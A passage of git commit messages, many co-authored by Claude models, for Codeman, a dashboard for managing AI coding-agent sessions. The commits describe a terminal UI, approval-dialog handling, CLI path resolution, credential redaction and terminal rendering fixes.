input, approvals answer, search, away digest, plan usage on status), and the
new cases assert on what the server RECEIVED rather than on the frame: the
prompt arrives as one line ending in a carriage return, and the answers as
the exact action and option digit.
Also covered: the tail refreshing in place, the search overlay selecting a
live session, the digest rendering, one bell for an item announced twice,
and the 409 path reported as "no longer on screen".
The plan-usage chip is punctuated with the glyph tier's separator, so an
ASCII terminal no longer gets a stray middle dot in the header.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The dashboard stops being read-only. The selected session's tail is polled
once a second while the plain list has focus and the layout is wide, and an
unchanged tail never reaches the model, so a quiet session costs no repaint.
A row with no live buffer says so instead of polling forever.
Keys: y/n and the parsed digits answer the selected session's dialog through
`POST /api/approvals/:id/answer` (never a blind keystroke: that route
re-captures the pane and 409s when the dialog has moved on, which the TUI
reports as "no longer on screen"); `p` opens a one-line composer aimed at
the selected session; `/` searches with a 250ms debounce and Enter switches
to a live session result; `g` shows the away digest. A new prompt rings the
bell exactly once, tracked by item id so a repaint or a refetch cannot
stutter, and the plan-usage chip rides `GET /api/status` plus its telemetry
event.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The preview pane now leads with the pending dialog when the selected session
has one: the question, the options with their digits, and the keys that
answer them, red for a dialog and yellow for a waiting prompt. The card is
capped at half the pane, because the tail is why the pane exists.
Around it: a header badge counting prompts that need a human, a preview
title that sacrifices the path rather than the state word, the footer
becoming the composer line while one is open (with the cell the terminal
cursor belongs in, so it can be shown there and hidden everywhere else), and
the search and digest panels as overlays with a stable width.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The store gains the three overlays phase 2 needs, each taking the keyboard
when it is set and all of them cleared together by closeOverlay(), plus the
pure flattening of `GET /api/search`'s typed groups into rows a cursor can
move over: headers are chrome, and only a session that is on the list counts
as selectable, since a history hit has no row to move the cursor to.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Three small pure modules the phase-2 verbs are built on:
- tui-composer: the single-line editor behind `p` and `/`, holding text as
code points so a cursor can never split a surrogate pair, with the scroll
window derived from the width rather than remembered.
- tui-approvals: what an approvals-inbox item's card says, which keys are
live for it (a digit answers only when the server parsed that option, and
an idle prompt answers to none of them), and which ids the bell has not
rung for yet.
- tui-digest: the away digest as compact lines, counts first and one line
per entry, with a capped tail per section.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Spawns the real command in a pseudo-terminal against a fake API server
(canned status/unified/approvals plus an SSE stream the test pushes
into), which is the only way to cover raw-mode key decoding, frames
reaching a terminal, SSE-driven refresh and the exit sequence that has to
restore the user's screen.
Two details the assertions depend on: frames are addressed absolutely
rather than newline-separated, so the parser takes the last COMPLETE
frame (the pty delivers one in several chunks, and reading a half-written
frame would be racy), and it reads the sidebar column only, or a name
echoed in the preview pane could answer for a row.
The child gets its own data dir and a tmux socket name nothing runs on,
so nothing here can see or touch the machine's real sessions.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
`codeman tui` opens the dashboard, `codeman tui --list` prints the
numbered list and exits (the `sc -l` replacement, plain when piped) and
`codeman tui <n>` attaches straight to a row (the `sc 2` replacement).
Both fast paths short-circuit before any screen setup, and both refuse
the numbers path without a terminal instead of half-opening a UI.
Bare `codeman` still prints help: the web UI stays the primary surface.
The TUI module is imported lazily so the other commands do not pay for it
at startup.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The IO half of src/tui: it owns the terminal, the timers, stdin and the
tmux handoff, and every decision it makes that is a function of its
inputs is an exported pure helper with unit tests (attach planning, the
typed kill confirmation, keymap selection, the repaint test, degraded
rows).
What it does: live session list over the unified API with SSE-driven
resync (debounced, with a 2s poll fallback the client asks for), cursor
and 1-9 navigation, attach and return, kill behind a typed confirmation
that refuses history rows and the session hosting the TUI, a new-session
case and CLI picker over quick-start, and degraded mode straight from
tmux when no server answers, re-probing so a server that starts upgrades
the dashboard in place.
Restoring the terminal is the part that has to be bulletproof: leave() is
idempotent and runs from normal quit, SIGINT/SIGTERM, a process exit hook
and prepended fatal handlers (src/index.ts already handles those by
exiting, so a listener registered after it would never run).
Attach is a handoff, never a proxy: the screen is restored and tmux gets
the real terminal. Inside tmux on the same socket there is nothing to
hand off to, so it issues switch-client and exits.
The preview pane, approvals answering, the prompt composer, search and
the digest are the next step; the region renders a placeholder rather
than pretending to load something.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The footer and the help overlay held the plan's full keymap, which would
advertise verbs (prompt, search, digest, answer, resume) that the build
does not implement yet and teach users that the TUI ignores keys. Both
now take their entries from the render options when the caller passes
them; the built-in lists stay as the fallback.
The picker overlay windows its items around the cursor rather than
clipping them, so the selected case stays visible in a long list.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The app layer repaints on state change, so the store has to be able to
say that something changed: `revision` is bumped by every mutating
method, and the repaint test compares it against the last painted frame.
Without it an idle dashboard would either redraw on a timer or go stale.
Three additions come with it, all optional so nothing existing changes
shape: `TuiSessionRow.muxName` (the unified list carries no mux name, so
the app fills it in from the local tmux enumeration and a row without one
cannot be attached), a `new-session` UI mode, and `TuiPickerState`, the
one-column chooser behind `n`.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Everything the dashboard needs from outside the process, behind one typed
surface, so the app loop stays a loop. It is a client of the running server and
nothing else: rows come from the unified list, blocked states from the
approvals inbox, and answering goes through the endpoint that re-captures the
pane and refuses with a 409 when the dialog has already been answered in tmux.
That refusal is a typed result rather than an exception, because a human
beating you to a prompt is normal operation.
Discovery mirrors the daemon probe (`CODEMAN_API_URL`, else loopback on
`CODEMAN_PORT`, self-signed TLS accepted) and credentials come from where
`codeman attach` already reads them. An explicit port outranks the ambient
`CODEMAN_API_URL`, which every managed session exports: a caller that named a
port must not be redirected at whatever server owns its shell.
Input is single-line and `\r`-terminated at this layer, so no caller can strand
text on an unsubmitted composer, and each send is tagged for the server's
exactly-once path. The event stream defaults to a `?sessions=` filter that
matches nothing, which drops the terminal firehose while lifecycle, hook and
approval events still arrive. A silent-but-open stream is caught by a watchdog
rather than a socket error, since that failure mode reports nothing at all.
With no server answering, sessions are listed from tmux on the instance socket
(argv, never a shell string) and decorated from a read-only peek at state.json,
which keeps the "the server died, get me to my sessions" path alive.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Node has no EventSource, so the live-update stream is read as raw bytes and
decoded here. Three details are what the parser exists for: a TCP read can end
between the CR and the LF of a CRLF, so a trailing CR is held back rather than
dispatched; the tunnel padding the server appends after a frame is a comment
with no blank line after it and must not split anything; and the keepalive is a
NAMED event, because an SSE comment is invisible to a browser client by spec.
Event classification lives here too, as a set rather than a prefix test:
`session:terminal` is most of the stream and the preview pane pulls its own
tail, so it is deliberately not a resync trigger.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The socket name was computed inside tmux-manager, which the TUI cannot import
just to learn which `-L` name its degraded-mode listing belongs on (that module
is the server's tmux driver, not a lookup table). The resolver moves next to
`dataPath()`, where the other half of the instance identity already lives, so
both processes agree by construction instead of by a copied default.
Behaviour is unchanged: the override still wins only when it is a name that can
be passed to `tmux -L` safely, and TmuxManager keeps warning about one that
cannot.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
One absolutely-addressed line per row, each closed with an erase-to-end, so
nothing scrolls and a repaint cannot leave the previous frame's tail behind.
The caller wraps the result in synchronized-output brackets; that is an IO
decision and stays out of the renderer.
Color is passed in rather than detected. chalk's detection is right for the
one-shot CLI but would make a frame non-deterministic, so the palette is raw
SGR in the same semantic roles cli-style uses, and `color: false` emits nothing
but the cursor addressing, the session's own colors in the preview included.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Below 72 columns the preview pane is dropped and rows take two lines, the
constraint the `sc` chooser was built around and the reason it is still usable
on a phone; above it a clamped sidebar carries the list and the preview takes
the rest.
Every region is clamped to a non-negative size, so a 5x5 terminal degrades to a
header instead of handing the renderer negative widths.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Rows are the ones GET /api/sessions/unified already returns and blocked states
are the items the approvals inbox already parsed, both imported as types only
so a CLI process pulls in neither the server nor node-pty. Classification
speaks the web UI's language (red blocked, yellow waiting, green working) so a
user with both surfaces open never has to translate between them.
Groups order by how long a session has been in its state, which is why WORKING
anchors on the pane's last Enter: a working pane repaints about once a second,
so its last-activity stamp always says "now".
Selection is tracked by session id, never by row index: rows re-sort under the
cursor whenever a session starts working or an approval lands, and an
index-tracked cursor would quietly move the selection to another session
between two keystrokes.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Decodes printable UTF-8, the control keys, arrows in both CSI and SS3 forms and
SGR mouse reports out of a byte stream that can tear anywhere, so a sequence
split across two reads decodes the same as one that arrives whole.
A lone ESC cannot be told from the start of an arrow key by looking at bytes,
so the parser holds it and the caller resolves it with flush() once its
disambiguation timer fires. Unknown sequences are swallowed: a stray CSI must
never reach a prompt composer as typed text.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The preview pane shows a session's raw terminal stream, so it needs the tail
reconstructed rather than emulated: SGR survives, cursor steering and OSC do
not, and a carriage return returns to column 0 so a spinner that repaints its
line 200 times contributes one line instead of 200.
Widths count East Asian Wide characters as two columns, which the clip and pad
helpers rely on to never cut a wide character, a code point or an escape
sequence in half.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The entry dates from an abandoned prototype (0.1427) and would have kept the
real TUI modules untracked while `git status` stayed silent about it.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
`codeman attach <path>` posts an attachment card for a local file; it
was described as attaching a Claude hook context. And Codeman never
overrides the tmux prefix for local sessions (only remote-SSH and docker
panes get C-q), so the detach hint is Ctrl+B D, matching the chooser.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The file asserted against a hand-written fixture array with its own
argument parser, so it could not see a command being renamed, losing an
alias or disappearing, and it described a `tui` command that does not
exist. It now walks program.commands: names, aliases, subcommands,
option flags, operands, descriptions, and a guard against registering a
name or alias twice at one level.
Assertions are "at least this exists", so a new command (including the
tui one this plan adds later) passes without editing the test.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The startup banner is now the only one (the CLI printed a duplicate) and
is painted like the rest of the CLI. The non-loopback-without-password
warning was plain console.warn while the CLI's copy of the same warning
was yellow; chalk degrades off a TTY, so journald and web.log stay free
of escape codes.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- doctor is colorized through the ReportStyle hook: verdict glyph and
failing status text painted, paths and hints muted, versions left
alone. `doctor --json` still prints raw JSON.
- `codeman web -d`, `web --stop` and `service install` block for up to
30s polling /api/status; each now runs under a spinner instead of a
silent terminal.
- `codeman reset` asks a real y/N question on a TTY. Non-interactive
callers keep the old "Use --force to confirm." refusal, so no script
can be answered by a question it cannot see.
- `codeman list` was a drifted copy of `codeman session list`; both now
call one renderer, with the shorthand opting out of the stopped and
web-server sections.
- `web` no longer prints its own "running at" line: the server prints
one, and unlike this one it also covers the daemon and service paths.
- every chalk call goes through the palette, so the CLI has one place
where colors are decided.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
"Antigravity CLI" is 15 characters and the hardcoded padEnd(14) pushed
that whole row one column right. Widths now come from the widest cell.
The header always said the CLI layer may colorize, but there was no way
to: renderTable now takes an optional ReportStyle whose hooks are
identity by default, so the module still decides nothing about color and
its output stays byte-stable. Padding is applied outside the paint, so a
row with no path detail ends at its status text instead of trailing
spaces inside a color run.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
One vocabulary for everything the codeman CLI prints: semantic palette,
the glyph set the commands already used, heading/rule/kv, width-aware
table layout, a stderr spinner and a y/N confirm.
Color detection stays chalk's, so NO_COLOR and non-TTY degradation keep
working with no second detector to disagree with it. The layout math and
glyph selection are pure and exported, which is what lets the dependency
report reuse them while staying color-free.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Post-merge follow-ups for PR #329 (shared CLI executable resolution):
- Negative-cache resolution misses with a doubling backoff (1min -> 5min
cap, cliResolveRetryDelayMs, mirroring claudeVersionRetryDelayMs): the
shared resolver cached success only, so a missing CLI re-ran the whole
chain - ending in a synchronous interactive login-shell spawn bounded by
the 5s EXEC_TIMEOUT_MS - on every /api/<cli>/status request and Run
attempt, stalling the event loop each time, forever. Success still caches
for the process lifetime, so an installed CLI is picked up within minutes
without a restart. Tests drive the backoff via an injectable clock
(createCliExecutableResolver `now` option, threaded through the
createPiResolverForTest / createAntigravityResolverForTest wrappers).
- Pass killSignal: 'SIGKILL' on the resolver's login-shell spawn and on the
pi/claude --version probes: execFileSync's timeout only SENDS the kill
signal and then keeps waiting for the child to exit, and interactive bash
ignores SIGTERM, so a login shell stuck in a blocking .bash_profile
survived the timeout and blocked the server permanently.
- Restore test hermeticity (PR #329 deleted pi's VITEST guards, and one
test pinned the deletion): under vitest the production resolver host now
replaces un-injected IO primitives with inert stubs - no real PATH
scanning, no login-shell spawns - and probePiVersion never executes a
`pi` candidate again (`pi` is a generic binary name, so route tests
hitting /api/pi/status executed whatever binary the machine carried).
Tests opt in through the runCommand/isExecutableFile injection hooks or
allowRealIoUnderVitest for real-filesystem fixtures. The deletion-pinning
test is replaced by behavioral pins, including a real-executable fixture
in the new test/pi-cli-resolver.test.ts that fails loudly if the pi gate
is ever removed again.
- Wire the six get*NotFoundMessage() exports (previously dead) into their
intended call sites: the createSession throws in tmux-manager and the
availability gates on POST /api/sessions and POST /api/quick-start in
session-routes, replacing a third hardcoded copy of the text. A not-found
error now names where resolution looked (server PATH, login shell,
checked directories). npm run knip no longer reports any unused export
from the resolver modules.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Post-merge follow-ups for #328 (GET /api/system/repo-status):
- Event-loop blocking: every git invocation in repo-status.ts is now async
(promisified execFile), never execFileSync — the per-remote ls-remote +
fetch could hold the event loop (SSE, PTY streaming) for up to ~60s per
request. The whole computation is single-flight with a 45s TTL cache
(createSingleFlightCache): concurrent requests share one in-flight
promise, a fresh result is served without spawning git, and a rejected
compute is never cached. Route handler shape and response fields
unchanged; remotes still processed sequentially (concurrent fetches in
one repo contend on ref locks).
- Credential disclosure: the redaction from git-clone.ts is extracted as
exported redactGitCredentials() (sanitizeGitOutput now uses it) and
applied via redactRemoteStatus() to every remote card's url and error
string, so a scheme://user:token@host remote URL (or git stderr echoing
it) never reaches a client.
- Non-interactive env: runGit() now uses the shared gitNonInteractiveEnv()
instead of a partial GIT_TERMINAL_PROMPT/BatchMode env, also closing the
GIT_ASKPASS/SSH_ASKPASS/SSH_ASKPASS_REQUIRE/DISPLAY/GCM_INTERACTIVE
prompt paths.
- Upstream parse bug: a local-branch upstream (@{upstream} with no slash,
e.g. after `git branch -u otherbranch`) made slice(0, indexOf('/')) into
slice(0, -1) and yielded garbage like "maste". parseTrackingRemote()
(pure, unit-tested) returns null for it, and the bare ref is dropped so
it cannot be mistaken for a remote-tracking ref downstream.
Tests extended in test/repo-status.test.ts (parseTrackingRemote,
redactGitCredentials/redactRemoteStatus, createSingleFlightCache
single-flight/TTL/rejection semantics).
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Three post-merge fixes for the external-CLI response viewer:
- ?context=full blocks now carry role ('user' for prompts, 'assistant'
for response/status/tool). The frontend's loadFullContext() renders
via msg.role, so the roleless blocks lost the "You" badge and every
turn rendered as the agent. kind/label/text are unchanged and the
frontend needs no change.
- normalizeDividerStatusLine() dropped its backtracking regex
(/^[─-]+\s*(.+?)\s*[─-]{3,}$/): the lazy middle went catastrophic on
a long dash run without a 3-dash tail (measured 15.5s at 4,000 chars,
minutes at 10,000), and pane text is agent-controlled with buffers up
to 32MB. Replaced by a linear counter walk with the identical accept
set and captured content, pinned char-for-char against the old regex
by a brute-force corpus test plus a hostile-input regression test
that fails by timeout with the RegExp version (same approach as the
glob-matcher hardening in 68ae9a8).
- 'pi' joins EXTERNAL_CLI_MODES: pi sessions had the identical
empty-viewer symptom the transcript branch exists to fix. The list
stays a local duplicate of isExternalCliMode() (importing session.ts
would drag node-pty into the pure module); a new exhaustive parity
test asserts the two mode sets can no longer drift.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
#325 renamed _sessionUsesServerMouseStrip to _shouldReportMouseToCli and
added the server-observed cliMouseTracking half of the gate, which also
turned codex tap reports from measured no-ops into not-sent-at-all. The
invariants paragraph still described the old name and the old behavior.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The reschedule guard is `this._status === 'running' && this.loopTimer === null`,
but the timer callback never nulls `loopTimer`. So the handle stays non-null from
the first fire onward, the guard is false on every subsequent pass, and the Ralph
loop silently stops polling after exactly two ticks.
It stops without changing status: `status` stays `running`, `stop()` is never
called, and no error is raised — the loop just quietly never runs again, which is
what makes it hard to notice on a long autonomous run.
Null the handle inside the callback before re-entering `runLoop()`, which is the
pattern `orchestrator-loop.ts` already uses for its own reschedule.
Test: a regression case in test/ralph-loop.test.ts that runs a real 5ms-interval
loop for ~16 intervals and asserts it ticks at least 3 times. Against the unfixed
source it reports exactly 2.
A CLI installed by nvm, Homebrew or a user-level npm prefix lives on a PATH that
only a login shell sets up. Codeman running under systemd or launchd does not get
that PATH — launchd hands a job `/usr/bin:/bin:/usr/sbin:/sbin` — so every
resolver reported the CLI as unavailable on installs where it is plainly there
and works from a terminal.
Each of the six resolvers had its own hand-rolled copy of the same PATH walk, so
the fix is factored into one shared `createCliExecutableResolver()` with an
explicit lookup order: the server process PATH, then common install directories in
order, then an interactive login shell as the last resort. Only the last step
spawns anything, and only when the cheap lookups have already missed.
Also adds `formatCliNotFoundMessage()`, so a failure explains where it looked
instead of just asserting the CLI is missing. Its diagnostics are bounded and
control characters are flattened, so a not-found message cannot dump arbitrary
environment data.
Success is cached and failure is retried, so installing a CLI while the server is
running is picked up without a restart.
Net -103 lines across the six resolvers. Behaviour is unchanged wherever the CLI
was already on the process PATH: that remains the first thing checked.
Tests: 20 cases in test/cli-executable-resolver.test.ts covering the precedence
order, login-shell-only resolution, the caching rule, unsafe-name rejection, and
the bounded diagnostics.
`GET /api/system/update/check` answers "is there a newer published release
tag?", which is the right question for an npm install but not for a git clone
that tracks a branch. Such an install can be many commits behind its own remote
while the latest tag says it is current, and nothing surfaces that.
Adds `GET /api/system/repo-status`: an informational companion that reports what
this CHECKOUT looks like against its own remotes — current branch and commit,
ahead/behind counts per remote, the remote's role (tracking / upstream / other),
and a bounded list of incoming commits.
Read-only and defensive: every git invocation is `execFileSync` with an argv
array and a timeout, a non-git or remote-less install reports a structured
`error` rather than throwing, and nothing here mutates the working tree or
touches the updater's own state.
Tests: 24 cases in test/repo-status.test.ts.
`GET /api/sessions/:id/last-response` branches to a Codex-specific reader, then
falls through to scanning `~/.claude/projects` for a transcript. OpenCode, Gemini
and Antigravity render their own TUIs and never write one, so that scan finds
nothing and the response viewer is permanently empty for all three modes.
For these CLIs the pane IS the transcript, so segment it. `response-viewer-transcript.ts`
is a pure, dependency-free parser that splits a terminal buffer into prompt /
response / status / tool blocks, keying off the `›` prompt marker, status
dividers and `• Calling|Called` tool-activity lines. The route uses it to answer
with the LAST response, and to carry the parsed blocks under `?context=full`.
Codex keeps its existing branch: it has real rollout files, which are a better
source than scraped pane text.
The response shape is unchanged for every other mode, and Claude panes are
explicitly pinned to the Claude transcript path so a real transcript can never
be shadowed by scraped text.
Tests: 14 parser cases plus a route suite covering all three modes, the
`?context=full` payload, an empty pane, and the Claude regression guard.
Confirming an AskUserQuestion left its tab flowing red for the rest of
the turn (owner report: ~8 minutes on a running session, with no dialog
anywhere on screen). Two separate bugs, both live-verified.
The re-capture erased the evidence the staleness check runs on. Claude
Code fires the Notification behind the dialog (measured 6-7s on v2.1.237,
documented up to ~30s), so the 600ms re-capture routinely lands on a
frame the user has ALREADY answered, parses nothing, and applyCapture
overwrote item.options with undefined. A MISSING options is how "we never
could read this dialog" is expressed, and those items stay answerable by
design, so a cleared field was indistinguishable from a never-parsed one
and the item became permanently unsweepable: it survived every
GET /api/approvals and every page reload, cleared only on `stop`, and
still accepted an answer, sending a bare `1` into a composer with no
dialog under it. applyCapture is now ADD-ONLY for options.
Nothing ran the staleness check while a page was open. It lived only in
GET /api/approvals, which seedApprovals() calls on init and reconnect, so
`stop` was the first thing that ever cleared an answered dialog. The
`working` signal now runs the pane-VERIFIED variant (resolveIfDialogGone
-> verifyStillAnswerable): the heuristic only decides when to look, the
screen decides the outcome, so the existing "working can flap" rule is
respected.
A frame that parses no options is now conclusive in two cases, and only
those, so an unreadable capture still keeps the alert: the item once
parsed options, or the frame shows Claude actively running a turn. A
modal dialog BLOCKS the turn, so the two cannot coexist - measured, a
live-dialog frame carries neither the elapsed-timer spinner nor the
"esc to interrupt" footer, which the dialog replaces with "Enter to
select". That second signal is reached by a delayed staleness pass (3s)
scheduled alongside the re-capture, which closes the late-hook case where
the prompt is answered before the hook lands: nothing ever parses, `stop`
may have gone by already, and the alert outlived reloads until the 12h
TTL. The pass is deliberately later than RECAPTURE_DELAY_MS, whose whole
reason for existing is that the hook can beat Ink to the screen.
Frontend: _onHookElicitationComplete cleared only the elicitation entry,
but an AskUserQuestion arrives as permission_prompt, so it was clearing
the wrong alert; it now clears both, matching the server's kind-agnostic
APPROVAL_RESOLVING_EVENTS.
Verified end to end on an isolated beta instance, not just in unit tests:
before, resolution could only come from the stop route (approval:resolved
always immediately preceding hook:stop); after, it arrives from the new
paths, and a simulated late hook resolves at +3.12s with no stop, no
working signal and no GET, while the pane is still working. Tests use
frames captured off a live pane and each new one was confirmed to fail
against the old behaviour.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Found while verifying Auto Copy in a browser: a plain left click in a
claude/codex/gemini pane sent a synthetic SGR mouse report into the PTY
whether or not the program in that pane had ever enabled mouse tracking.
When the pane holds a plain shell (the CLI exited, or a shell was started
inside a session of that mode) readline prints the report as literal text
and it garbles the next line typed:
$ [<0;88;20Mecho hello
bash: 0: No such file or directory
The cause is that the browser could not know. The full strip
(isAltScreenStripMode) removes the mouse DECSETs from the stream, so
xterm's modes.mouseTrackingMode is permanently 'none' for those modes and
_sendSyntheticSgrTap() hand-encodes reports to stand in for xterm's own
encoder. With no state to consult it had to do that on every click.
What the strip removes, the server now remembers.
_recordStrippedMouseMode() records each sequence as it is stripped,
toState() publishes it as cliMouseTracking, and the browser's
_shouldReportMouseToCli() (renamed from _sessionUsesServerMouseStrip)
requires it at all three report sites: the desktop click, the touchend
tap, and the mobile tap classifier.
Details that are easy to get wrong:
* Only the tracking modes count (1000/1001/1002/1003). 1005/1006 select
an encoding and 1007 is alt-scroll; a CLI that picks SGR encoding
without turning tracking on is not asking about clicks, and counting
those would put the stray reports straight back.
* Modes are held in a Set, so a TUI disabling a mode it never enabled
cannot clear the ones that are really on.
* The change broadcasts immediately instead of through
broadcastSessionStateDebounced: the flag flips when a dialog opens, and
the user can click that dialog well inside the 500ms debounce window.
* It fails toward silence. After a server restart the flag is false until
the CLI re-emits its DECSET, which tmux does at client attach.
Verified against a live claude 2.x session: the CLI holds a tracking mode
on continuously, so its clicks are still reported byte for byte as
before, while a bash prompt in the same stripped mode now reports
nothing and types cleanly. The flag also propagates live over SSE in both
directions, checked by toggling ?1002h/?1002l from inside the pane.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
App Settings > Terminal & Input > Selection & clipboard > Auto Copy
Selection (`autoCopySelection`, per-device, default OFF). With it on,
highlighting text in the terminal copies it: mouse drag, double-click
word, triple-click line, and the phone long-press selection. Ctrl+C is
untouched and still copies on demand.
Three things decide the shape of it:
* It fires at the END of a gesture, never in onSelectionChange. That
callback runs for every cell a drag crosses, so copying there would be
one clipboard write per mouse move. It only arms a pending flag; a
document-level mouseup listener flushes, and the touch path calls the
flush itself because it preventDefaults its touchend and no mouseup
ever arrives there.
* The flush is synchronous inside the handler, because both clipboard
paths need user activation: Firefox gates navigator.clipboard
.writeText on it, and execCommand('copy'), the fallback the plain-HTTP
LAN install lands on, has to run in the gesture's own task. A timer or
a wait for onSelectionChange loses it, invisibly in Chrome.
* It deliberately does NOT do what copyTerminalSelection() does. That
one clears the selection (so a second Ctrl+C is an interrupt) and
focuses the terminal. Clearing would make text vanish under the cursor
that just highlighted it, and focusing opens the on-screen keyboard
over it on a phone. Focus is instead restored to whatever held it,
which only matters for the execCommand fallback.
Guards are pure in decideAutoCopy() (constants.js): off, blank or
whitespace-only text, and a 1M-char cap, since a drag off the top of the
viewport autoscrolls and one gesture can sweep the whole 50k-line
scrollback. Past the cap the copy is refused rather than truncated, with
a toast pointing at Ctrl+C.
Feedback is silent on success except once per page load, so a feature
that works by doing nothing visible can still be told from a dead
toggle; failures and refusals toast, throttled to 10s.
Per-device on both counts the settings rule requires: in `displayKeys`
and absent from the .strict() SettingsUpdateSchema, because clipboard
access differs by device and by origin.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The last two items of #322: copyTerminal() copied the entire buffer but
was wired to no button, shortcut or call site anywhere, and it wrote
through navigator.clipboard directly, which is undefined on the
plain-HTTP LAN install, so it would have failed there even if it were
reachable. Everything that actually copies goes through
copyTerminalSelection() and _copyText's execCommand fallback; whole-
buffer copy, should anyone want it, is a selectAll() away from that
same working path.
Closes#322
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The Files search compiled the user's query into a backtracking RegExp:
'*a*a*a...' became '^.*a.*a.*a...$', the classic blowup, evaluated
synchronously against every walked path — a pathological query could
freeze the event loop for the whole server (and every user of it in
multi-user mode). /api/search stays regex-free for exactly this reason.
Globs now match through a two-pointer wildcard walk, O(text · pattern)
worst case, with a 256-char query cap bounding the pattern side; an
overlong query compiles to null, the same answer as an empty one.
Semantics are unchanged (anchored, case-insensitive, * spans slashes)
and the existing tests pass untouched; the pathological pattern gets a
test that fails by timeout with the RegExp version.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The new local-echo-overlay gotcha landed as a list item but left the
xterm-zerolag-input entry below it without its leading '- ', splitting
the Common Gotchas bullet list in two.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
An agent's numbered list wraps its URL, and the link opened a PREFIX of it:
1. https://github.com/users/someone/packages/container/p
ackage/thing
opened `…/container/p`. The provider already stitched hard wraps — Ink emits a real
newline, so nothing is flagged `isWrapped` and a row that fills the last column is
taken as continuing — but it joined the row texts VERBATIM, and the continuation
carries the list's own three-space indent. That whitespace lands in the middle of
the token, which is exactly where the URL pattern stops. Flush-left wrapped URLs
(Claude Code's own `/login`) worked, which is why this survived.
The touch-selection helpers had the shallower version of the same bug: they walked
`isWrapped` only, so `Line` grabbed the single row on screen rather than the
logical line, and a long-press on a wrapped token selected only its visible half.
So the reconstruction now lives in ONE place, `terminalLogicalLine` in
constants.js, and both consumers use it — the link provider matching patterns over
its text and the selection helpers measuring words and lines with it. A link that
spans a wrap and a `Line` that stops at the screen edge were the same bug twice.
The helper drops the leading whitespace of a HARD continuation (the program's
indent) and keeps that of a SOFT one (the emulator inserts nothing, so it is real
content), records the dropped width per segment so the offset↔cell mapping stays
exact in both directions, trims only the final row so earlier offsets stay aligned
to cells, and keeps the 12-row bound that stops a screenful of full-width output
from being re-scanned on every hover.
⚠️ Selection spans are computed in CELLS, not text offsets: an xterm selection is
one contiguous run, so a token spanning a hard wrap also covers the indent cells
between its halves. A run that skipped them cannot be expressed, and would not
match what is highlighted.
Tests: `test/terminal-logical-line.test.ts` (8 cases: the indent drop, resolving
from either row, both mapping directions, soft continuations kept verbatim, no
over-reach past a short row, the row bound, final-row trimming, a missing row) and
5 in `terminal-touch-tap.test.ts` (the whole URL from either row, a token selected
across the wrap, `Line` spanning both rows, no reach into the next line). Removing
either half of the fix reds 5 and 8 of them respectively.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The three fixes in this branch change what a tap and a long-press MEAN on a
phone, and add a UI surface with its own z-index — all of which this repo keeps
written down rather than discoverable only by reading the handlers.
- `docs/wiki/Mobile-Guide.md` (the published user manual): a new "Tapping, links
and copying" section, and the long-prompt behaviour in the keyboard section
where the existing scroll/tap rules live.
- `CLAUDE.md`: the touch-gesture invariants next to the scrollback/wheel material
(why the caret line is the boundary rather than the tap intent; why all three
selection guards exist), the overlay's new bottom bound alongside the
single-source note, and the selection bar in the z-index registry — 900, above
terminal content and the local-echo overlay and deliberately below floating
agent windows so it can never cover their controls.
- `i18n.js`: zh-CN for the bar's `Copy` / `Line` / `Clear selection`. The bar is a
SIBLING of `.xterm`, not a descendant, so `SKIP_SELECTOR` does not cover it and
the entries actually apply.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Typing a prompt long enough to wrap ran the text off the bottom of the screen: the
tail — the part being typed, where the cursor is — sat behind the on-screen
keyboard, so the user was typing blind. Two independent causes.
**The overlay had no bottom bound.** On touch devices keystrokes are buffered in
the local-echo overlay and do not reach the PTY until Enter, so the CLI never
learns the prompt is long and nothing scrolls or reflows to make room. Meanwhile
the renderer lays its wrapped lines out straight DOWNWARD from the prompt row
(`top = promptRow * cellH`, each line at `i * cellH`) with nothing clamping it to
the visible rows — and with the keyboard up there are only a handful of those.
The block now grows UPWARD once it would pass the last visible row: it is lifted
so its final line lands ON that row. Every line div is opaque, so it covers
transcript above rather than vanishing under the keyboard below — the same thing a
real terminal does when a composer expands. A prompt taller than the whole
viewport keeps its TAIL, for the same reason the fix exists: the end is what the
user is looking at. `startCol` indents only the line that starts at the prompt
marker, so it is dropped along with that line when only the tail fits, and the
cursor follows the last VISIBLE line.
`rows` joins the render key: the layout depends on it, so a keyboard opening —
which changes rows without changing the text — must not be skipped as a redundant
render.
**`_shrinkPaddingToFit()` was reclaiming the bars' own space.** On phones the
